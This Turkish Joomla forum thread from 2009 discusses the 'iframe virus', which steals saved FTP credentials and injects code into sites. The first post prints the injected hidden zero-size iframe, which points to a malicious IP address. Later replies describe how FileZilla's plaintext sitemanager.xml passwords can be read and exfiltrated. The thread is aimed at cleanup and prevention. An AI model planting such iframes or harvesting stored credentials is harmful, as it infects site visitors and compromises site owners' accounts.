CMSTURK.NET İYS (CMS) Forumları

Kullanıcı ismi
Parolanız
Geri git   CMSTURK.NET İYS (CMS) Forumları > İçerik Yönetim Sistemleri > Joomla! 1.5 > Güvenlik

Cevapla
Eski 10-06-2009, 00:26:03   #1
faruk8001
Üye
 
Üyelik tarihi: 01-08-2008
Yaş: 23
İletiler: 38




Standart İframe Virüsünün Çalışma Mantığı ve Virüsten Korunma ve Kurtulma Yolları

Değerli Joomla kullanıcıları son günlerde webmasterleri zor duruma düşüren bir virüs iframe virüsü. Bu makale virüsün çalışma mantığı, virüsten korunma ve kurtulma yollarını anlatmaktadır.

Virüs'ün çalışma mantığı:
Virüs bazı sitelerden (bu siteler özellikle virüs yayan sitelerde olabilir) sizin bilgisayarınıza bulaşır. Buradanda sizin ftp bilgilerinizi ve ftp programınızı kullanarak sitenize erişim sağlar. Sitenizde ismi index.php, index.htm, index.html olan dosyalara kendisini kopyalıyor. Böylece hem sitenin yazı karakterlerinde bozulma oluyor hem de siteye giren bilgisayarlara virüs bulaştırıyor.

Virüsün sitenize eklediği kod yapısı
Virüs sitenize aşağıdaki yapıda bir kod ekliyor.

<iframe src='http://81.95.145.240/logo/index.php' style='border:0px solid gray;' WIDTH=0 HEIGHT=0
FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>

Virüsten korunma yolları
1. Güncel bir antivirüs kullanın. Önerim: Kaspersky, nod32v4, antivir.

2. Kullandığınız ftp programında(örn.filezilla, cuteftp vb.) ftp bilgilerinizi kayıtlı olarak tutmayın. Yani Programda işiniz bittikten sonra geçmişi temizleyin ve bilgilerinizin programda tutulmadığından emin olun. Yani otomatik giriş özelliğini varsa iptal edin. Virüs sizin programda kayıtlı parolalarınızı kullanarak sitenize erişim sağlıyor. Virüsün keyloger(tuş kaydetme) özelliği yok. Direk kayıtlı parolayı kullanıyor.

3. Belirli zaman periyotlarıyla ftp parolanızı değiştirin.

Virüs Bulaşmışsa Kurtulma Yolları

1. Öncelikle ftp kullanıcı adınızı ve parolasını değiştirin.

2. Anti-virüs programınızı güncelleyin.

3. Eğer son günlerde sitenizde önemli güncellemeler yapmadıysanız ve fazla miktarda veri girmediyseniz hosting şirketine mail atın ve virüs bulaşmadan önceki bir tarihteki yedeklerinizi yükletin. Mantık olarak son günlerde veri girmiş olsanız bile virüs veri tabanına bulaşmadığı için önceki yedekleri yükletmeniz verilerin kaybolmasına neden olmaz diye düşünüyorum ama siz her ihtimale karşı veritabanı yedeğinizi alın.

4. Eğer 3. adımı uygulamayıp virüsü elle tek tek temizlemek isterseniz ki uzun ve zahmetli bir iştir. Sitenizin dosyalarını bilgisayarınıza ftp ile çekin.

5. İndex.php ve index html dosyarınızdan yukarıda verdiğim virüsün kodlarını silin. Kodları dosya içinde arama kriteriniz 81.95.145.240 ip numarası olabilir.

6. Virüsü temizledikten sonra dosyalarınızı tekrar hosta yolların. Böylece virüssüz bir siteye kavuşursunuz. En son işinizi garantiye almak için ftp parolanızı değiştirin.

Not: Virüs'ün joomlanın 1.0.x versiyonundan kaynaklandığına dair yanlış inanışlar var. Bu virüs joomla'nın 1.5.x sürümlerine de bulaşabildiği gibi html ve asp bir siteye de bulaşabilir.

Öneriler: Linux işletim sistemi kullanmanızdır. Linuxlardan ise tavsiye ettiğim Linux sürümü Ulusal işletim sistemiz PARDUS'tur. Çünkü linux platformunda virüs olayı yok bu yüzden siteye iframe virüsünün ve diğer virüs ve trojanların bulaşma olasılığı yok denecek kadar az. Çok uzun zamandır PARDUS kullanıyorum herhangi bir virüs vakasıyla karşılaşmadım.

Web tarayıcı olarakta firefox kullanırsanız biraz olsun zararlılardan kurtulmuş olursunuz. Saygılarımla
Yazan: Ömer Faruk UYDURAN
__________________
Sabahlara kadar namaz kılmaktan ayakları Şışen bir peygamberin, bilgisayar başında sabahlamaktan gözleri şişen ümmetiyiz ...
faruk8001 isimli üye şu anda çevrimdışı   Alıntı ile Cevapla
Eski 10-06-2009, 00:34:10   #2
BOzZ
Etkin Üye
 
BOzZ - ait Kullanıcı Resmi (Avatar)
 
Üyelik tarihi: 25-08-2007
Nereden: Ordu
Yaş: 24
İletiler: 433




Standart Cevap: İframe Virüsünün Çalışma Mantığı ve Virüsten Korunma ve Kurtulma Yolları

emeğine sağlık
gerçekten kötü bir virüs temizlenmesi de bir o kadar zahmetli.ve işin kötüsü antivirüs o virüsü tespit ettiğinde direk indexi siliyor.
__________________
Beni çekemeyenler Anten taktırsın :P
[*]Adalet gücü bağımsız olmayan bir milletin, devlet halinde varlığı kabul olunamaz.M.KEMAL ATATÜRK
BOzZ isimli üye şu anda çevrimdışı   Alıntı ile Cevapla
Eski 10-06-2009, 00:35:49   #3
faruk8001
Üye
 
Üyelik tarihi: 01-08-2008
Yaş: 23
İletiler: 38




Standart Cevap: İframe Virüsünün Çalışma Mantığı ve Virüsten Korunma ve Kurtulma Yolları

Yaralı olabildiysek ne mutlu bize.
__________________
Sabahlara kadar namaz kılmaktan ayakları Şışen bir peygamberin, bilgisayar başında sabahlamaktan gözleri şişen ümmetiyiz ...
faruk8001 isimli üye şu anda çevrimdışı   Alıntı ile Cevapla
Eski 10-06-2009, 22:08:55   #4
KaRaZeYbEk
Üye
 
KaRaZeYbEk - ait Kullanıcı Resmi (Avatar)
 
Üyelik tarihi: 05-06-2009
Nereden: SS ' den
İletiler: 13




Standart Cevap: İframe Virüsünün Çalışma Mantığı ve Virüsten Korunma ve Kurtulma Yolları

Bilgilendirme için teşekkürler
__________________

WWW.KABLOSUZGENCLİK.COM
KaRaZeYbEk isimli üye şu anda çevrimdışı   Alıntı ile Cevapla
Eski 10-06-2009, 23:51:35   #5
Akar
BU DİL, BU KÜLTÜR SENİN !
 
Akar - ait Kullanıcı Resmi (Avatar)
 
Üyelik tarihi: 23-12-2006
Nereden: Türk İli
Yaş: 35
İletiler: 16.185




Standart Cevap: İframe Virüsünün Çalışma Mantığı ve Virüsten Korunma ve Kurtulma Yolları

Faydalı olacak bir yazı. Ancak bir noktaya değineyim, arama kriteri ip olmamalı. Zira o kadar çok ip ya da url kullanılıyor ki bu bir netice vermez. Arama kriteri iframe olmalı ve bulunan neticeler tek tek kontrol edilerek temizlenmeli. Bunun ikinci sebebi ise asıl ortak noktanın iframe olmasıdır. iframe yöntemi ile yerleşen ancak diğer düzeni değişebilen bir yöntemden bahsediyoruz...belli bir virüsten değil
__________________
CMSTURK.NET - Özgün Forum, Temiz Ortam, Karşılıksız Yasal Paylaşım
İstanbul İmsâkiyesi - Ankara İmsâkiyesi
Ücretsiz Joomla Hosting - Ücretsiz Yüzyüze Joomla! Kursu - Ücretsiz Drupal Hosting - Ücretsiz Yüzyüze Drupal Kursu
Akar isimli üye şu anda  çevrimiçi.   Alıntı ile Cevapla
Eski 11-06-2009, 08:27:25   #6
Turgut Aydın
Çalışkan Üye
 
Turgut Aydın - ait Kullanıcı Resmi (Avatar)
 
Üyelik tarihi: 28-09-2007
İletiler: 134




Standart Cevap: İframe Virüsünün Çalışma Mantığı ve Virüsten Korunma ve Kurtulma Yolları

gerçekten yararlı bir konu olmuş teşekkürler.
__________________
Joomla-Memleketim
Turgut Aydın isimli üye şu anda çevrimdışı   Alıntı ile Cevapla
Eski 13-06-2009, 12:53:28   #7
elbeye
Üye
 
elbeye - ait Kullanıcı Resmi (Avatar)
 
Üyelik tarihi: 19-04-2007
İletiler: 23




Standart Cevap: İframe Virüsünün Çalışma Mantığı ve Virüsten Korunma ve Kurtulma Yolları

bu "iframe" arama kriterine nereye yazıcaz acaba ?

tüm dosyalarda tek tek mi arayacagız yani?
__________________
Projeler: kuzkoy.org | e-genclik.net | hedefltd.net
elbeye isimli üye şu anda çevrimdışı   Alıntı ile Cevapla
Eski 13-06-2009, 13:09:13   #8
BOzZ
Etkin Üye
 
BOzZ - ait Kullanıcı Resmi (Avatar)
 
Üyelik tarihi: 25-08-2007
Nereden: Ordu
Yaş: 24
İletiler: 433




Standart Cevap: İframe Virüsünün Çalışma Mantığı ve Virüsten Korunma ve Kurtulma Yolları

önce bilgisayarınızı bu virüsten temizleyeceksiniz.sonra installation ve configuration.php dosyarı hariç joomla paketini tekrar üstüne yazdırın. eger hostunuzu ve bilgisayarınızı tamamen temizlediyseniz dosyalarda üstüne yazıldıgı için büyük ihtimal sorun çözülecektir.

ve tabi 3.parti eklenti yüklüyse sitede ve eklentilere de bulaşmadıysa ki büyük ihtimal onlara da bulaşmıştır.o zaman sonrada eklendilerin indexlerini açıp <iframe> diye arattırıp silebilirsiniz.

anlayacağınız kötü bir virüs
__________________
Beni çekemeyenler Anten taktırsın :P
[*]Adalet gücü bağımsız olmayan bir milletin, devlet halinde varlığı kabul olunamaz.M.KEMAL ATATÜRK
BOzZ isimli üye şu anda çevrimdışı   Alıntı ile Cevapla
Eski 13-06-2009, 13:51:00   #9
ismailkagan
Üye
 
Üyelik tarihi: 09-02-2008
Nereden: TURAN
Yaş: 33
İletiler: 87




Standart Cevap: İframe Virüsünün Çalışma Mantığı ve Virüsten Korunma ve Kurtulma Yolları

ben kendi sunucumu kullanıyorum ve içerisinde ne kadar site varsa hepsi bu illetle karşı karşıya cpanel ve sunucu yönetimi için anlaştığım şirket hala uğraşıyorlar ki hala temizleyemediler...

bu bilgi bana çok faydalı olacak

ellerinize yüreğinize sağlık ...
__________________
Muhtaç olduğun kudret damarlarındaki asil kanda mevcuttur!!!
Mustafa Kemal ATATÜRK
ismailkagan isimli üye şu anda çevrimdışı   Alıntı ile Cevapla
Eski 13-06-2009, 17:40:27   #10
mimicom
Etkin Üye
 
mimicom - ait Kullanıcı Resmi (Avatar)
 
Üyelik tarihi: 19-08-2007
Nereden: İstanbul
İletiler: 482




Standart Cevap: İframe Virüsünün Çalışma Mantığı ve Virüsten Korunma ve Kurtulma Yolları

Benim 20 günümü alan bu iframe kodları ile temizleme noktasında edindiğim tecrübeleri sizlerle paylaşmak istiyorum. Bu yazımı dikkatle birkaç kez okuyup uyguladığınızda bu problemden kesinlikle kurtulacağınıza inanıyorum.

http://www.bizeozgu.com/index.php?op...ster&Itemid=73
__________________
BizeÖzgü Eğitim
mimicom isimli üye şu anda çevrimdışı   Alıntı ile Cevapla
Eski 10-07-2009, 01:48:39   #11
saygiserkan
Çalışkan Üye
 
saygiserkan - ait Kullanıcı Resmi (Avatar)
 
Üyelik tarihi: 14-08-2007
Nereden: İzmir
İletiler: 103




Standart Cevap: İframe Virüsünün Çalışma Mantığı ve Virüsten Korunma ve Kurtulma Yolları

Alıntı:
mimicom´isimli üyeden alıntı
Benim 20 günümü alan bu iframe kodları ile temizleme noktasında edindiğim tecrübeleri sizlerle paylaşmak istiyorum. Bu yazımı dikkatle birkaç kez okuyup uyguladığınızda bu problemden kesinlikle kurtulacağınıza inanıyorum.

http://www.bizeozgu.com/index.php?op...ster&Itemid=73

Sanırım bir 20 gün daha uğraşmanız gerekecek . Çünkü Şu saat itibarı ile site index siniz '' Parse error: syntax error, unexpected '/' in /home/bizeozgu/public_html/index.php on line 85 ''
__________________
You'll Never Walk Alone
saygiserkan isimli üye şu anda çevrimdışı   Alıntı ile Cevapla
Eski 10-07-2009, 02:08:09   #12
kendimce
Serdar KONAK
 
kendimce - ait Kullanıcı Resmi (Avatar)
 
Üyelik tarihi: 28-12-2006
Nereden: EDİRNE
Yaş: 34
İletiler: 809




Standart Cevap: İframe Virüsünün Çalışma Mantığı ve Virüsten Korunma ve Kurtulma Yolları

eklemek iserim ki bu virüs sadece index.htm ve ,php ,html, asp vb index dosyalarına bulaşmakla kalmıyor.

ulaşım izni olmayan başka amaçla kullandığım bir sitede bulunan jpg uzantılı dosyalara da bulaşmıştır.

siteye kendi yazdığım ftp programı ile ulaşıp dosya alış verişi yapmaktayım.

site adresi google de kayıtlı değil.
daha doğrusu ortada internete açık bir site yokken bu iframeler buna bulaşmış.

diyelimki bu siteye benim bilgisayarımda olan virüs bişeyler atıyor. ama işin ilginç tarafı benim bilgisayarın kapalı olduğu zamanlarda dosyalar değişmesi.

durum kısaca şudur.


bir kere iframe yiyen sitelerin ftp şifreleri uzak bir sunucuya ya da bilgisayara iletiliyor ve istediğini kadar temizlik yapın ftp şifrelerini değiştirmedikçe kendi bilgisayarınızda antivirüs olasa da sitenize tekrar iframe atılacaktır.

eğerki ele geçirilen bayi panel şifreleri ise tüm sitelere geçecektir.

sanıldığı gibi siteye giriş yapınca bilgisayarınıza virüs bulaşmıyor. sadece o anda bilgisayarınızda kayıtlı ne kadar şifre varsa ilgili yere iletiliyor.
biliyorsunuz online olarak bilgisayarınız taranabilmektedir. ve her kaydettiğiniz şifre birgün mutlaka ele geçirilecektir.

bilgisayarınızın linux olmasının bir işe yarayacağını sanmıyorum.
(büyük ihtimalle..)dediğim gibi bu kodlarla bilgisayara virüs bulamıyor sadece anlık olarak bilgileriniz uçuyor karşıya..

eklemek isterim istekler doğrultusunda geliştirilecek olan bu tüm dosyaları arama programını kullanarak iframe veya script gibi kelimeleri tek tek arama yapmadan hengi dosyalarda olduğunu bulabilisiniz.

işte program

NOT: bir de antivürüs programların otomatik temizle olarak seçen arkadaşlar dikkat etsinler. tüm siteyi ftp ile indirdikten sonra 100 lerce dosyayı arıyorlar bende birşey yok diyorlar veya bikaçını buluyorlar. temizleyip geri göndeiyorlar oysa
virüslü inde.html dosası indirilirken antivirüs tarafından karantinaya taşınıyor veya siliniyor ve tekrar geri gönderirken bu dosya olmadığı için sunucudaki üzerine yazılamıyor sunucudaki html dosyası olduğu gibi kalıyor. bir diğer nokta ize yazma izni olmayan dosyaların üzerine attım sanılıyor oysa eskisi yenisi ile değişmiyor. bunlara da dikkat etmek gerek.
__________________
www.e-yazisma.com

Özel mesajdan destek veremiyoruz.
kendimce isimli üye şu anda çevrimdışı   Alıntı ile Cevapla
Eski 10-07-2009, 11:11:18   #13
BOzZ
Etkin Üye
 
BOzZ - ait Kullanıcı Resmi (Avatar)
 
Üyelik tarihi: 25-08-2007
Nereden: Ordu
Yaş: 24
İletiler: 433




Standart Cevap: İframe Virüsünün Çalışma Mantığı ve Virüsten Korunma ve Kurtulma Yolları

Alıntı:
kendimce´isimli üyeden alıntı
eklemek iserim ki bu virüs sadece index.htm ve ,php ,html, asp vb index dosyalarına bulaşmakla kalmıyor.

ulaşım izni olmayan başka amaçla kullandığım bir sitede bulunan jpg uzantılı dosyalara da bulaşmıştır.

siteye kendi yazdığım ftp programı ile ulaşıp dosya alış verişi yapmaktayım.

site adresi google de kayıtlı değil.
daha doğrusu ortada internete açık bir site yokken bu iframeler buna bulaşmış.

diyelimki bu siteye benim bilgisayarımda olan virüs bişeyler atıyor. ama işin ilginç tarafı benim bilgisayarın kapalı olduğu zamanlarda dosyalar değişmesi.

durum kısaca şudur.


bir kere iframe yiyen sitelerin ftp şifreleri uzak bir sunucuya ya da bilgisayara iletiliyor ve istediğini kadar temizlik yapın ftp şifrelerini değiştirmedikçe kendi bilgisayarınızda antivirüs olasa da sitenize tekrar iframe atılacaktır.

eğerki ele geçirilen bayi panel şifreleri ise tüm sitelere geçecektir.

sanıldığı gibi siteye giriş yapınca bilgisayarınıza virüs bulaşmıyor. sadece o anda bilgisayarınızda kayıtlı ne kadar şifre varsa ilgili yere iletiliyor.
biliyorsunuz online olarak bilgisayarınız taranabilmektedir. ve her kaydettiğiniz şifre birgün mutlaka ele geçirilecektir.

bilgisayarınızın linux olmasının bir işe yarayacağını sanmıyorum.
(büyük ihtimalle..)dediğim gibi bu kodlarla bilgisayara virüs bulamıyor sadece anlık olarak bilgileriniz uçuyor karşıya..

eklemek isterim istekler doğrultusunda geliştirilecek olan bu tüm dosyaları arama programını kullanarak iframe veya script gibi kelimeleri tek tek arama yapmadan hengi dosyalarda olduğunu bulabilisiniz.

işte program

NOT: bir de antivürüs programların otomatik temizle olarak seçen arkadaşlar dikkat etsinler. tüm siteyi ftp ile indirdikten sonra 100 lerce dosyayı arıyorlar bende birşey yok diyorlar veya bikaçını buluyorlar. temizleyip geri göndeiyorlar oysa
virüslü inde.html dosası indirilirken antivirüs tarafından karantinaya taşınıyor veya siliniyor ve tekrar geri gönderirken bu dosya olmadığı için sunucudaki üzerine yazılamıyor sunucudaki html dosyası olduğu gibi kalıyor. bir diğer nokta ize yazma izni olmayan dosyaların üzerine attım sanılıyor oysa eskisi yenisi ile değişmiyor. bunlara da dikkat etmek gerek.

Evet çoğu kişi sadece bilgisayara bulaştığını sanıyorlardı.Oysaki ftp aracılığıyla atılan bir virüs.Ayrıca jpg dosyalarına da bulaştığını ilk defa duyduş oldum. Çok açıklayıcı bir yazı olmuş emeğine sağlık.

Peki şifreler nasıl gidiyor.Yani ne oluyorda şifreleri anlık olarak alabiliyorlar.Bunun hakkında kesin bir bilgi var mı. Benim bildiğim kadarıyla genelde warez içerikler yoluyla bulaştığıydı.
__________________
Beni çekemeyenler Anten taktırsın :P
[*]Adalet gücü bağımsız olmayan bir milletin, devlet halinde varlığı kabul olunamaz.M.KEMAL ATATÜRK
BOzZ isimli üye şu anda çevrimdışı   Alıntı ile Cevapla
Eski 10-07-2009, 12:41:41   #14
memoc@n
hamsikoli
 
memoc@n - ait Kullanıcı Resmi (Avatar)
 
Üyelik tarihi: 13-01-2007
Nereden: İstanbul Eşrafından
Yaş: 40
İletiler: 6.983




Standart Cevap: İframe Virüsünün Çalışma Mantığı ve Virüsten Korunma ve Kurtulma Yolları

Forumda filist.php hakkında da araştırma yapın sonuçta dosyalarda yapılan bir değişiklik söz konusu ve hangi dosyalarda bu değişikliğin yapıldığını da bulma olanağınız olacaktır
__________________
Joomla / Mehmet
Joomla Site Dizini - Sitenizi Ekleyin
memoc@n isimli üye şu anda çevrimdışı   Alıntı ile Cevapla
Eski 10-07-2009, 15:56:04   #15
kendimce
Serdar KONAK
 
kendimce - ait Kullanıcı Resmi (Avatar)
 
Üyelik tarihi: 28-12-2006
Nereden: EDİRNE
Yaş: 34
İletiler: 809




Standart Cevap: İframe Virüsünün Çalışma Mantığı ve Virüsten Korunma ve Kurtulma Yolları

çok kişi filezilla kullanıyor güvenli deniliyor. ve çoğumuzun birçok site ftpsini girmek zor geldiğinden site yönetiminden kayıt edip giriyoruz.

oysa bu programda
C:\Documents and Settings\........\Application Data\FileZilla
dizininde sitemanager.xml adındaki dosyada açık seçik şifreler tutulmakta..

bu dosyayı; adı belli adresi beli ve isteyerek veya istemeyerek tıkladığmız iframe script dosyası içinden çalışan kodlarla okuyup karşı bilgisayara iltmek çok zor değil.
anlık olarak dediğim olay bu.

virüslü siteye tıklandığı anda bizim bilgiler uçup gidiyor olabilir. ve antivürüsler buna engel de olmayabilir. neticede basit bir dosya okuma işlemi..

Alıntı:
BOzZ´isimli üyeden alıntı
Peki şifreler nasıl gidiyor.Yani ne oluyorda şifreleri anlık olarak alabiliyorlar.Bunun hakkında kesin bir bilgi var mı. Benim bildiğim kadarıyla genelde warez içerikler yoluyla bulaştığıydı.
__________________
www.e-yazisma.com

Özel mesajdan destek veremiyoruz.
kendimce isimli üye şu anda çevrimdışı   Alıntı ile Cevapla
Cevapla


Konuyu Toplam 1 Kişi okuyor. (0 Kayıtlı üye ve 1 Misafir)
 
Seçenekler
Stil

Yetkileriniz
Yeni konu açma izni :Pasif
Konu cevaplama izni :Pasif
Eklenti ekleme izni :Pasif
Mesaj düzenleme izni : Pasif

BB code is Açık
[IMG] Kodları Açık
HTML KodlarıKapalı


Benzer Konular
Konu Konuyu Başlatan Forum Cevaplar Son İleti
İframe ile trojan bulaşmış ama nerede? Alaca33 Php Fusion 1 14-03-2010 18:45:41
İframe modüle eklenebilir mi? canova Haber - Yorum - İçerik 14 11-07-2009 14:47:02
galleri mantığı çözemiyorum metis Galeri - Ses - Görüntü 2 15-09-2007 14:23:25
örnekteki sitenin önsayfa çalışma mantığı? joomladelisi Genel Sistem Soruları 5 12-09-2007 12:01:06


Bütün Zaman Ayarları WEZ +3 olarak düzenlenmiştir. Şu anki saat: 06:32:46 .
CMSTURK.NET Forum Sistemimiz vBulletin® Güncel 3.8.5 Sürümüdür
Copyright ©2000 - 2010, Jelsoft Enterprises Ltd.
© 2006 - 2010 CMSTURK.NET